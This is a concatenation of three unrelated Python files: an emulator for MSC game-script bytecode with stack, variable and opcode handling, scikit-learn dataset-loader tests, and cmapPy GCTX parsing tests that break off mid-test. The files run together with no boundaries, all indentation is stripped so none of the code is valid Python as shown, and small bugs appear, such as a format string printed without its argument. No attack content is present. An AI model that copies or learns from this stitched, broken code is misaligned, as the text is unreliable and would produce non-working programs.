#push a value onto the stack given that the push bit is enabled
def push(val, actuallyPush=True):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if not actuallyPush:
return
if stackPos == 0x80:
print("At instruction %08X:")
print("WARNING: STACK OVERFLOW, STACK INDEX OVERWRITTEN ")
newVal = None
if type(val) == int:
newVal = (val & 0xFFFFFFFF)
elif type(val) == float:
newVal = floatToInt(val)
else:
print("ERROR: Invalid type to push type=%s at position %X (Object = %s)" % (str(type(val)), evalPos, str(val)))
raise TypeError("Invalid push type")
if stackPos < 0x80 and stackPos >= 0:
stack[stackPos] = newVal
elif stackPos == 0x80:
stackPos = newVal
elif stackPos < 0:
globalVars[0x8A + stackPos] = newVal
else:
print("WARNING: WRITE OOB (Not in emulated memory)")
stackPos += 1
def pop():
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if stackPos == 0:
print("At instruction %08X:" % evalPos)
print("WARNING: STACK UNDERFLOW")
stackPos -= 1
value = None
if stackPos < 0 and stackPos >= -0x8A:
value = globalVars[0x8A + stackPos]
elif stackPos >= 0 and stackPos < 0x80:
value = stack[stackPos]
    elif stackPos == 0x80:
value = stackPos
else:
print("WARNING: OOB POP UNHANDLED BY EMU, RETURNING 0")
print(" this will cause inaccuracy in emulation")
return 0
if value == None:
print("WARNING: POPPED UNINITIALIZED VALUE, ASSUMING 0")
return 0
else:
return value
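#Descriptive note on the emulated memory layout implied by push()/pop() above:
#  stackPos in [0, 0x7F] -> stack[stackPos] (the 0x80-entry value stack)
#  stackPos == 0x80      -> the stack index register itself
#  stackPos < 0          -> globalVars[0x8A + stackPos] (underflow spills into global variables)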
def getVar(varType, varNum):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if varType == 0: #(Local)
if localVarPos + varNum == 0x80:
return stackPos
elif localVarPos + varNum < 0x80:
return stack[localVarPos+varNum]
else:
print("WARNING: OOB READ OF LOCAL VAR %i AT LOCATION %X" % (varNum, evalPos))
print(" IS UNMAPPED IN EMULATOR MEMORY, TO AVOID")
print(" ERRORS ASSUMING VALUE OF 0, THIS WILL")
print(" LIKELY BE INACCURATE TO ON CONSOLE BEHAIVIOR")
return 0
elif varType == 1: #(global variable)
if varNum < 0x8A:
return globalVars[varNum]
elif varNum >= 0x8A and varNum < 0x10A:
return stack[varNum - 0x8A]
elif varNum == 0x10A:
return stackPos
elif varNum > 0x10A:
print("WARNING: OOB READ OF GLOBAL VAR %i AT LOCATION %X" % (varNum, evalPos))
print(" IS UNMAPPED IN EMULATOR MEMORY, TO AVOID")
print(" ERRORS ASSUMING VALUE OF 0, THIS WILL")
print(" LIKELY BE INACCURATE TO ON CONSOLE BEHAIVIOR")
return 0
else:
print("ERROR: UNKNOWN VARIABLE TYPE %i AT LOCATION %X" % (varType, evalPos))
raise ValueError
def setVar(varType, varNum, value, pushBit):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if varType == 0: #(Local)
if localVarPos + varNum == 0x80:
stackPos = value
elif localVarPos + varNum < 0x80:
stack[localVarPos+varNum] = value
else:
print("WARNING: OOB WRITE OF LOCAL VAR %i AT LOCATION %X" % (varNum, evalPos))
print(" IS UNMAPPED IN EMULATOR MEMORY, THIS WRITE")
print(" WILL NOT HAVE HAPPENED MORE OR LESS")
elif varType == 1: #(global variable)
if varNum < 0x8A:
globalVars[varNum] = value
elif varNum >= 0x8A and varNum < 0x10A:
stack[varNum - 0x8A] = value
elif varNum == 0x10A:
stackPos = value
elif varNum > 0x10A:
print("WARNING: OOB READ OF GLOBAL VAR %i AT LOCATION %X" % (varNum, evalPos))
print(" IS UNMAPPED IN EMULATOR MEMORY, THIS WRITE")
print(" WILL NOT HAVE HAPPENED MORE OR LESS")
else:
print("ERROR: UNKNOWN VARIABLE TYPE %i AT LOCATION %X" % (varType, evalPos))
raise ValueError
if pushBit:
push(value)
#Converts an int representing bytes to a float
#Example 0x3F800000 -> 1.0
def intToFloat(val):
return struct.unpack('>f', struct.pack('>L', val))[0]
#Converts a float to an int representing bytes
#Example 1.0 -> 0x3F800000
def floatToInt(val):
return struct.unpack('>L', struct.pack('>f', val))[0]
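#Example round trip (matches the comments above):
#  intToFloat(0x3F800000) -> 1.0
#  floatToInt(1.0)        -> 0x3F800000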
def printf(printString, args):
    specifierLocs = [i for i,j in enumerate(printString) if j == '%' and i + 1 < len(printString) and printString[i+1] in ['x', 'X', 'i', 'f', '0']]
for i,j in enumerate(specifierLocs):
if printString[j+1] == 'f':
args[i] = intToFloat(args[i])
print(printString % tuple(args))
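#Illustrative example (hedged): '%f' specifiers get their raw-int argument converted first, so
#  printf("val: %f", [0x3F800000])
#prints "val: 1.000000".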
def evalCommand(command):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if command == None or command.command == 0xFFFE:
if evalPos != None:
print("Error: Invalid command at %X" % evalPos)
quit()
else:
print("Error: Invalid command (And Invalid eval position)")
executing = False
return
    #This is used for determining whether to add the command size to evalPos afterwards
isJump = False
c = command.command
cParams = command.parameters
pushBit = command.pushBit
if c == 0x0: #nop
pass
elif c == 0x1:
pass
elif c == 0x2: #begin
stackPos -= cParams[0]
functionStack.append(FunctionInfo(localVarPos, linkRegister, stackPos))
localVarPos = stackPos
stackPos += cParams[1]
elif c in [0x3, 0x6, 0x7, 0x8, 0x9]: #end or return
if len(functionStack) == 0:
executing = False
return
fInfo = functionStack.pop()
if fInfo.returnAddress == None:
executing = False
return
if c in [0x6, 0x8]: #return a value
v = pop()
stackPos = fInfo.stackPos
push(v)
localVarPos = fInfo.localVarPos
evalPos = fInfo.returnAddress
isJump = True
elif c in [0x4, 0x5, 0x36]:
isJump = True
evalPos = cParams[0]
elif c == 0xA or c == 0xD:
push(cParams[0], pushBit)
elif c == 0xB:
push(getVar(cParams[0], cParams[1]), pushBit)
elif c == 0xC:
pass
elif c == 0xE:
push(pop() + pop(), pushBit) #Add int
elif c == 0xF:
push((-pop()) + pop(), pushBit) #Subtract int
elif c == 0x10:
push(pop() * pop(), pushBit) #Multiply int
elif c == 0x11:
divideBy = pop()
push(pop() // divideBy, pushBit) #Divide int
elif c == 0x12:
divideBy = pop()
push(pop() % divideBy, pushBit) #Mod int
elif c == 0x13:
push(-pop(), pushBit) #Negate value
elif c == 0x14:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) + 1,pushBit) #Var++
elif c == 0x15:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) - 1,pushBit) #Var--
elif c == 0x16:
push(pop() & pop(), pushBit)#bitAnd
elif c == 0x17:
push(pop() | pop(), pushBit)#bitOr
elif c == 0x18:
push(pop() ^ 0xFFFFFFFF, pushBit)#bitNot
elif c == 0x19:
push(pop() ^ pop(), pushBit)#bitXor
elif c == 0x1A:
shiftBy = pop() #leftShift
push(pop() << shiftBy, pushBit)
elif c == 0x1B:
shiftBy = pop()
push(pop() >> shiftBy, pushBit)#rightShift
elif c == 0x1C:
setVar(cParams[0], cParams[1], pop(),pushBit) #setVar
elif c == 0x1D:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) + pop(),pushBit) #Var +=
elif c == 0x1E:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) - pop(),pushBit) #Var -=
elif c == 0x1F:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) * pop(),pushBit) #Var *=
elif c == 0x20:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) // pop(),pushBit) #Var /=
elif c == 0x21:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) % pop(),pushBit) #Var %=
elif c == 0x22:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) & pop(),pushBit) #Var &=
elif c == 0x23:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) | pop(),pushBit) #Var |=
elif c == 0x24:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) ^ pop(),pushBit) #Var ^=
elif c == 0x25:
push(int(pop() == pop()), pushBit) #equals
elif c == 0x26:
push(int(pop() != pop()), pushBit) #not equals
elif c == 0x27:
compareTo = pop()
push(int(pop() < compareTo), pushBit) #less than
elif c == 0x28:
compareTo = pop()
push(int(pop() <= compareTo), pushBit) #less than or equal
elif c == 0x29:
compareTo = pop()
push(int(pop() > compareTo), pushBit) #greater than
elif c == 0x2A:
compareTo = pop()
push(int(pop() >= compareTo), pushBit) #greater than or equal to
elif c == 0x2B:
push(0 if pop() != 0 else 1, pushBit)#logic not
elif c == 0x2C:
formatString = strings[pop()]
formatValues = []
for i in range(cParams[0]-1):
formatValues.insert(0, pop())
printf(formatString, formatValues)
elif c == 0x2D:
args = []
for i in range(cParams[0]):
args.insert(0, pop())
syscall(cParams[1], args, pushBit)
elif c == 0x2E:
exceptionRegister = cParams[0]
elif c in [0x2F, 0x30, 0x31]:
isJump = True
jumpPos = pop()
#paramList = [pop() for i in range(cParams[0])]
hitException = False
if c == 0x2F:
gottenScript = mscFile.getScriptAtLocation(jumpPos)
if gottenScript == None or gottenScript.getCommand(jumpPos).command != 0x2:
print("WARNING: at %X invalid function call, jumping to exception register (%X)" % (evalPos, exceptionRegister))
evalPos = exceptionRegister
hitException = True
isJump = True
if not hitException:
isJump = True
linkRegister = evalPos + len(command)
evalPos = jumpPos
elif c == 0x32:
v = pop()
        push(v) #push back; this essentially duplicates the last return value
push(v)
push(v,pushBit)
elif c == 0x33:
push(pop(), pushBit)
elif c == 0x34:
if pop() == 0:
isJump = True
evalPos = cParams[0]
elif c == 0x35:
if pop() != 0:
isJump = True
evalPos = cParams[0]
elif c == 0x38:
convertToFloat = lambda i: floatToInt(float(i))
stack[stackPos - (1 + cParams[0])] = convertToFloat(stack[stackPos - (1 + cParams[0])]) # intToFloat
elif c == 0x39:
convertToInt = lambda f: int(intToFloat(f))
stack[stackPos - (1 + cParams[0])] = convertToInt(stack[stackPos - (1 + cParams[0])]) # floatToInt
elif c == 0x3A:
push(intToFloat(pop()) + intToFloat(pop()), pushBit)
elif c == 0x3B:
v = intToFloat(pop())
push(intToFloat(pop()) - v, pushBit)
elif c == 0x3C:
push(intToFloat(pop()) * intToFloat(pop()), pushBit)
elif c == 0x3D:
v = intToFloat(pop())
push(intToFloat(pop()) / v, pushBit)
elif c == 0x3E:
push(-intToFloat(pop()), pushBit)
elif c == 0x3F:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) + 1),pushBit) #float Var++
elif c == 0x40:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) - 1),pushBit) #float Var--
elif c == 0x41:
setVar(cParams[0], cParams[1], pop(), pushBit) #setFloatVar
elif c == 0x42:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) + intToFloat(pop())),pushBit) #float Var+=
elif c == 0x43:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) - intToFloat(pop())),pushBit) #float Var-=
elif c == 0x44:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) * intToFloat(pop())),pushBit) #float Var*=
elif c == 0x45:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) / intToFloat(pop())),pushBit) #float Var/=
elif c == 0x46:
compTo = intToFloat(pop())
push(int(intToFloat(pop()) == compTo), pushBit)
elif c == 0x47:
compTo = intToFloat(pop())
push(int(intToFloat(pop()) != compTo), pushBit)
elif c == 0x48:
compTo = intToFloat(pop())
push(int(intToFloat(pop()) < compTo), pushBit)
elif c == 0x49:
        push(int(intToFloat(pop()) <= intToFloat(pop())), pushBit) #float less than or equal
elif c == 0x4A:
        push(int(intToFloat(pop()) > intToFloat(pop())), pushBit) #float greater than
elif c == 0x4B:
compTo = intToFloat(pop())
push(int(intToFloat(pop()) >= compTo), pushBit)
elif c == 0x4D:
executing = False
return
if not isJump:
evalPos += len(command)
def evalMscFile(mscFileObject):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister,mainLoopFunc
mscFile = mscFileObject
strings = mscFile.strings
evalPos = mscFile.entryPoint
startScript = mscFile.getScriptAtLocation(mscFile.entryPoint)
if startScript != None:
executing = True
while executing:
currentExecutingScript = mscFile.getScriptAtLocation(evalPos)
if currentExecutingScript != None:
evalCommand(currentExecutingScript.getCommand(evalPos))
if executing:
executing = (evalPos != None)
else:
executing = False
def evalFile(filepath):
with open(filepath, 'rb') as f:
mscFile = MscFile().readFromFile(f)
evalMscFile(mscFile)
def evalText():
global stack, stackPos
mscFile = MscFile()
strs = []
scriptString = ""
print("+----------------------------------------------+")
print("| Text interpreter - Type in your script. |")
print("| Script input will stop after you type 'end' |")
print("+----------------------------------------------+")
nextLine = input()
while nextLine.strip().lower() != "end":
scriptString += nextLine + "\n"
nextLine = input()
scriptString += nextLine
print("------------------------------------------------")
scr = MscScript()
cmds = parseCommands(scriptString, mscStrings=strs)
cmdsSize = 0
for c in cmds:
cmdsSize += len(c)
scr.bounds = [0x10, 0x10+cmdsSize]
scr.cmds = cmds
scr.setStart(0x10)
scr.offset(0x10)
mscFile.entryPoint = 0x10
mscFile.strings = strs
mscFile.scripts.append(scr)
if scr[0].command == 0x2 and scr[0].parameters[0] > 0:
stackPos = scr[0].parameters[0]
print('Input %i parameter(s)' % scr[0].parameters[0])
for i in range(scr[0].parameters[0]):
p = input('Input parameter %i: ' % i).strip()
if p[-1] == 'f':
stack[i] = int(floatToInt(float(p[0 : len(p)-1])))
else:
stack[i] = int(p, 0)
evalMscFile(mscFile)
def load_fighter_param_common(filepath):
global sharedVars
p = openParam(filepath)
for i in range(len(p)):
val = p[i]
if isinstance(val, f32):
val = floatToInt(val)
elif not True in [isinstance(val, t) for t in [u8, s8, u16, s16, u32, s32]]:
continue
sharedVars[0x12000000 + i] = int(val)
sharedVars[0x02000000 + i] = int(val)
def load_fighter_param(filepath, entry):
global sharedVars
p = openParam(filepath)[0].entry(entry)
for i in range(len(p)):
val = p[i]
if isinstance(val, f32):
val = floatToInt(val)
elif not True in [isinstance(val, t) for t in [u8, s8, u16, s16, u32, s32]]:
continue
sharedVars[0x13000000 + i] = int(val)
sharedVars[0x03000000 + i] = int(val)
def main():
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister,sharedVars,mainLoopFunc
mscFile = None
mscFileBytes = None
mainLoopFunc = None
stack = [None] * 0x80
functionStack = []
stackPos = 0
localVarPos = 0
evalPos = 0
exceptionRegister = 0
linkRegister = None
globalVars = [None] * 0x8A #Note a lot of this is actually unused but is simulated for exploitation
executing = False
strings = []
sharedVars = {}
#Parse arguments
parse = ArgumentParser(description="Emulate MSC bytecode")
parse.add_argument("--fighter_param_common", action="store", dest="fighter_param_common", help="Path of fighter_param_common to load")
parse.add_argument("--fighter_param", action="store", dest="fighter_param", help="Path of fighter_param to load")
parse.add_argument("--character", action="store", dest="character", help="Name of character to load from fighter_param")
parse.add_argument("--character_list", action="store_true", dest="charLS", help="List character names")
parse.add_argument("mscFile", nargs='?', type=str, help="MSC File to emulate")
args = parse.parse_args()
charIds = {'miienemyf': 62, 'miienemys': 63, 'miienemyg': 64, 'littlemacg': 60, 'mariod': 36, 'pikmin': 26, 'sheik': 17, 'roy': 54, 'yoshi': 7, 'duckhunt': 45, 'koopajr': 46, 'pit': 24, 'metaknight': 23, 'cloud': 55, 'miifighter': 0, 'miiswordsman': 1, 'miigunner': 2, 'wiifit': 40, 'pacman': 49, 'gamewatch': 19, 'peach': 14, 'robot': 31, 'rockman': 50, 'fox': 9, 'zelda': 16, 'bayonetta': 56, 'purin': 35, 'donkey': 4, 'shulk': 47, 'ryu': 52, 'toonlink': 32, 'sonic': 34, 'lucariom': 61, 'lizardon': 33, 'littlemac': 41, 'kirby': 8, 'pikachu': 10, 'murabito': 42, 'ness': 13, 'palutena': 43, 'diddy': 27, 'mario': 3, 'wario': 22, 'link': 5, 'ike': 29, 'rosetta': 39, 'samus': 6, 'falcon': 12, 'mewtwo': 51, 'lucas': 53, 'ganon': 20, 'koopag': 58, 'gekkouga': 48, 'dedede': 28, 'pitb': 38, 'lucina': 37, 'warioman': 59, 'marth': 18, 'szerosuit': 25, 'koopa': 15, 'kamui': 57, 'lucario': 30, 'luigi': 11, 'reflet': 44, 'falco': 21}
if args.charLS:
print(list(charIds.keys()))
quit()
if args.fighter_param != None and isfile(args.fighter_param) and args.character in charIds:
print("loading fighter_param")
load_fighter_param(args.fighter_param, charIds[args.character])
if args.fighter_param_common != None and isfile(args.fighter_param_common):
load_fighter_param_common(args.fighter_param_common)
if args.mscFile == None:
evalText()
else:
evalFile(args.mscFile)
if __name__ == '__main__':
main()
import os
import shutil
import tempfile
import warnings
import numpy
from pickle import loads
from pickle import dumps
from functools import partial
from sklearn.datasets import get_data_home
from sklearn.datasets import clear_data_home
from sklearn.datasets import load_files
from sklearn.datasets import load_sample_images
from sklearn.datasets import load_sample_image
from sklearn.datasets import load_digits
from sklearn.datasets import load_diabetes
from sklearn.datasets import load_linnerud
from sklearn.datasets import load_iris
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import load_boston
from sklearn.datasets import load_wine
from sklearn.datasets.base import Bunch
from sklearn.datasets.tests.test_common import check_return_X_y
from sklearn.externals.six import b, u
from sklearn.externals._pilutil import pillow_installed
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raises
DATA_HOME = tempfile.mkdtemp(prefix="scikit_learn_data_home_test_")
LOAD_FILES_ROOT = tempfile.mkdtemp(prefix="scikit_learn_load_files_test_")
TEST_CATEGORY_DIR1 = ""
TEST_CATEGORY_DIR2 = ""
def _remove_dir(path):
if os.path.isdir(path):
shutil.rmtree(path)
def teardown_module():
"""Test fixture (clean up) run once after all tests of this module"""
for path in [DATA_HOME, LOAD_FILES_ROOT]:
_remove_dir(path)
def setup_load_files():
global TEST_CATEGORY_DIR1
global TEST_CATEGORY_DIR2
TEST_CATEGORY_DIR1 = tempfile.mkdtemp(dir=LOAD_FILES_ROOT)
TEST_CATEGORY_DIR2 = tempfile.mkdtemp(dir=LOAD_FILES_ROOT)
sample_file = tempfile.NamedTemporaryFile(dir=TEST_CATEGORY_DIR1,
delete=False)
sample_file.write(b("Hello World!\n"))
sample_file.close()
def teardown_load_files():
_remove_dir(TEST_CATEGORY_DIR1)
_remove_dir(TEST_CATEGORY_DIR2)
def test_data_home():
# get_data_home will point to a pre-existing folder
data_home = get_data_home(data_home=DATA_HOME)
assert_equal(data_home, DATA_HOME)
assert_true(os.path.exists(data_home))
# clear_data_home will delete both the content and the folder it-self
clear_data_home(data_home=data_home)
assert_false(os.path.exists(data_home))
# if the folder is missing it will be created again
data_home = get_data_home(data_home=DATA_HOME)
assert_true(os.path.exists(data_home))
def test_default_empty_load_files():
res = load_files(LOAD_FILES_ROOT)
assert_equal(len(res.filenames), 0)
assert_equal(len(res.target_names), 0)
assert_equal(res.DESCR, None)
def test_default_load_files():
try:
setup_load_files()
res = load_files(LOAD_FILES_ROOT)
assert_equal(len(res.filenames), 1)
assert_equal(len(res.target_names), 2)
assert_equal(res.DESCR, None)
assert_equal(res.data, [b("Hello World!\n")])
finally:
teardown_load_files()
def test_load_files_w_categories_desc_and_encoding():
try:
setup_load_files()
category = os.path.abspath(TEST_CATEGORY_DIR1).split('/').pop()
res = load_files(LOAD_FILES_ROOT, description="test",
categories=category, encoding="utf-8")
assert_equal(len(res.filenames), 1)
assert_equal(len(res.target_names), 1)
assert_equal(res.DESCR, "test")
assert_equal(res.data, [u("Hello World!\n")])
finally:
teardown_load_files()
def test_load_files_wo_load_content():
try:
setup_load_files()
res = load_files(LOAD_FILES_ROOT, load_content=False)
assert_equal(len(res.filenames), 1)
assert_equal(len(res.target_names), 2)
assert_equal(res.DESCR, None)
assert_equal(res.get('data'), None)
finally:
teardown_load_files()
def test_load_sample_images():
try:
res = load_sample_images()
assert_equal(len(res.images), 2)
assert_equal(len(res.filenames), 2)
assert_true(res.DESCR)
except ImportError:
warnings.warn("Could not load sample images, PIL is not available.")
def test_load_digits():
digits = load_digits()
assert_equal(digits.data.shape, (1797, 64))
assert_equal(numpy.unique(digits.target).size, 10)
# test return_X_y option
check_return_X_y(digits, partial(load_digits))
def test_load_digits_n_class_lt_10():
digits = load_digits(9)
assert_equal(digits.data.shape, (1617, 64))
assert_equal(numpy.unique(digits.target).size, 9)
def test_load_sample_image():
try:
china = load_sample_image('china.jpg')
assert_equal(china.dtype, 'uint8')
assert_equal(china.shape, (427, 640, 3))
except ImportError:
warnings.warn("Could not load sample images, PIL is not available.")
def test_load_missing_sample_image_error():
if pillow_installed:
assert_raises(AttributeError, load_sample_image,
'blop.jpg')
else:
warnings.warn("Could not load sample images, PIL is not available.")
def test_load_diabetes():
res = load_diabetes()
assert_equal(res.data.shape, (442, 10))
assert_true(res.target.size, 442)
assert_equal(len(res.feature_names), 10)
assert_true(res.DESCR)
# test return_X_y option
check_return_X_y(res, partial(load_diabetes))
def test_load_linnerud():
res = load_linnerud()
assert_equal(res.data.shape, (20, 3))
assert_equal(res.target.shape, (20, 3))
assert_equal(len(res.target_names), 3)
assert_true(res.DESCR)
assert_true(os.path.exists(res.data_filename))
assert_true(os.path.exists(res.target_filename))
# test return_X_y option
check_return_X_y(res, partial(load_linnerud))
def test_load_iris():
res = load_iris()
assert_equal(res.data.shape, (150, 4))
assert_equal(res.target.size, 150)
assert_equal(res.target_names.size, 3)
assert_true(res.DESCR)
assert_true(os.path.exists(res.filename))
# test return_X_y option
check_return_X_y(res, partial(load_iris))
def test_load_wine():
res = load_wine()
assert_equal(res.data.shape, (178, 13))
assert_equal(res.target.size, 178)
assert_equal(res.target_names.size, 3)
assert_true(res.DESCR)
# test return_X_y option
check_return_X_y(res, partial(load_wine))
def test_load_breast_cancer():
res = load_breast_cancer()
assert_equal(res.data.shape, (569, 30))
assert_equal(res.target.size, 569)
assert_equal(res.target_names.size, 2)
assert_true(res.DESCR)
assert_true(os.path.exists(res.filename))
# test return_X_y option
check_return_X_y(res, partial(load_breast_cancer))
def test_load_boston():
res = load_boston()
assert_equal(res.data.shape, (506, 13))
assert_equal(res.target.size, 506)
assert_equal(res.feature_names.size, 13)
assert_true(res.DESCR)
assert_true(os.path.exists(res.filename))
# test return_X_y option
check_return_X_y(res, partial(load_boston))
def test_loads_dumps_bunch():
bunch = Bunch(x="x")
bunch_from_pkl = loads(dumps(bunch))
bunch_from_pkl.x = "y"
assert_equal(bunch_from_pkl['x'], bunch_from_pkl.x)
def test_bunch_pickle_generated_with_0_16_and_read_with_0_17():
bunch = Bunch(key='original')
# This reproduces a problem when Bunch pickles have been created
# with scikit-learn 0.16 and are read with 0.17. Basically there
# is a surprising behaviour because reading bunch.key uses
# bunch.__dict__ (which is non empty for 0.16 Bunch objects)
# whereas assigning into bunch.key uses bunch.__setattr__. See
# https://github.com/scikit-learn/scikit-learn/issues/6196 for
# more details
bunch.__dict__['key'] = 'set from __dict__'
bunch_from_pkl = loads(dumps(bunch))
# After loading from pickle the __dict__ should have been ignored
assert_equal(bunch_from_pkl.key, 'original')
assert_equal(bunch_from_pkl['key'], 'original')
# Making sure that changing the attr does change the value
# associated with __getitem__ as well
bunch_from_pkl.key = 'changed'
assert_equal(bunch_from_pkl.key, 'changed')
assert_equal(bunch_from_pkl['key'], 'changed')
def test_bunch_dir():
# check that dir (important for autocomplete) shows attributes
data = load_iris()
assert_true("data" in dir(data))
import logging
import unittest
import os
import pandas as pd
import numpy as np
import h5py
import pandas.util.testing as pandas_testing
import cmapPy.pandasGEXpress.setup_GCToo_logger as setup_logger
import cmapPy.pandasGEXpress.GCToo as GCToo
import cmapPy.pandasGEXpress.parse_gctx as parse_gctx
import cmapPy.pandasGEXpress.mini_gctoo_for_testing as mini_gctoo_for_testing
import cmapPy.pandasGEXpress.subset_gctoo as subset_gctoo
import cmapPy.pandasGEXpress.write_gctx as write_gctx
__author__ = "Oana Enache"
__email__ = "[email protected]"
FUNCTIONAL_TESTS_PATH = "../functional_tests"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
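# HDF5 node paths used to address the data matrix and row/column metadata inside a GCTX file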
version_node = "version"
rid_node = "/0/META/ROW/id"
cid_node = "/0/META/COL/id"
data_node = "/0/DATA/0/matrix"
row_meta_group_node = "/0/META/ROW"
col_meta_group_node = "/0/META/COL"
class MockHdf5Dset(object):
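    """Minimal stand-in for an h5py dataset: exposes shape, dtype and read_direct
    so metadata parsing can be exercised without a real HDF5 file."""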
def __init__(self, data_list, dtype):
self.data_list = data_list
self.shape = (len(data_list),)
self.dtype = dtype
def read_direct(self, dest):
for i in range(len(dest)):
dest[i] = self.data_list[i]
class TestParseGctx(unittest.TestCase):
def test_parse(self):
# parse whole thing
mg1 = mini_gctoo_for_testing.make()
mg2 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx")
pandas_testing.assert_frame_equal(mg1.data_df, mg2.data_df)
pandas_testing.assert_frame_equal(mg1.row_metadata_df, mg2.row_metadata_df)
pandas_testing.assert_frame_equal(mg1.col_metadata_df, mg2.col_metadata_df)
# test with string rid/cid
test_rids = ['LJP007_MCF10A_24H:TRT_CP:BRD-K93918653:3.33', 'LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666']
test_cids = ['LJP007_MCF7_24H:TRT_POSCON:BRD-A61304759:10']
mg3 = subset_gctoo.subset_gctoo(mg1, rid=test_rids, cid=test_cids)
mg4 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx",
rid=test_rids, cid=test_cids)
pandas_testing.assert_frame_equal(mg3.data_df, mg4.data_df)
pandas_testing.assert_frame_equal(mg3.row_metadata_df, mg4.row_metadata_df)
pandas_testing.assert_frame_equal(mg3.col_metadata_df, mg4.col_metadata_df)
# first, make & write out temp version of mini_gctoo with int rids/cids
new_mg = mini_gctoo_for_testing.make(convert_neg_666=False)
int_indexed_data_df = new_mg.data_df.copy()
int_indexed_data_df.index = [str(i) for i in range(0, 6)]
int_indexed_data_df.columns = [str(i) for i in range(10, 16)]
int_indexed_row_meta = new_mg.row_metadata_df.copy()
int_indexed_row_meta.index = int_indexed_data_df.index
int_indexed_col_meta = new_mg.col_metadata_df.copy()
int_indexed_col_meta.index = int_indexed_data_df.columns
int_indexed_gctoo = GCToo.GCToo(data_df=int_indexed_data_df, row_metadata_df=int_indexed_row_meta,
col_metadata_df=int_indexed_col_meta)
write_gctx.write(int_indexed_gctoo, "int_indexed_mini_gctoo.gctx")
# test with numeric (repr as string) rid/cid
mg5 = GCToo.GCToo(data_df=int_indexed_data_df, row_metadata_df=int_indexed_row_meta,
col_metadata_df=int_indexed_col_meta)
mg5 = subset_gctoo.subset_gctoo(mg5, row_bool=[True, False, True, False, True, False],
col_bool=[True, False, False, True, True, True])
mg5.data_df.index.name = "rid"
mg5.data_df.columns.name = "cid"
mg5.row_metadata_df.index.name = "rid"
mg5.row_metadata_df.columns.name = "rhd"
mg5.col_metadata_df.index.name = "cid"
mg5.col_metadata_df.columns.name = "chd"
mg6 = parse_gctx.parse("int_indexed_mini_gctoo.gctx", rid=["0", "2", "4"],
cid=["10", "13", "14", "15"], convert_neg_666=False)
os.remove("int_indexed_mini_gctoo.gctx")
pandas_testing.assert_frame_equal(mg5.data_df, mg6.data_df)
pandas_testing.assert_frame_equal(mg5.row_metadata_df, mg6.row_metadata_df)
pandas_testing.assert_frame_equal(mg5.col_metadata_df, mg6.col_metadata_df)
# test with ridx/cidx
mg7 = subset_gctoo.subset_gctoo(mg1, rid=['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'],
cid=['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'])
mg8 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", ridx=[4], cidx=[4])
pandas_testing.assert_frame_equal(mg7.data_df, mg8.data_df)
pandas_testing.assert_frame_equal(mg7.row_metadata_df, mg8.row_metadata_df)
pandas_testing.assert_frame_equal(mg7.col_metadata_df, mg8.col_metadata_df)
# test with rid/cidx
mg9 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx",
rid=['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'],
cidx=[4])
pandas_testing.assert_frame_equal(mg7.data_df, mg9.data_df)
pandas_testing.assert_frame_equal(mg7.row_metadata_df, mg9.row_metadata_df)
pandas_testing.assert_frame_equal(mg7.col_metadata_df, mg9.col_metadata_df)
# test with ridx/cid
mg10 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", ridx=[4],
cid=['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'])
pandas_testing.assert_frame_equal(mg7.data_df, mg10.data_df)
pandas_testing.assert_frame_equal(mg7.row_metadata_df, mg10.row_metadata_df)
pandas_testing.assert_frame_equal(mg7.col_metadata_df, mg10.col_metadata_df)
# test with row_meta_only
mg11 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", row_meta_only=True)
pandas_testing.assert_frame_equal(mg11, mg1.row_metadata_df)
# test with col_meta_only
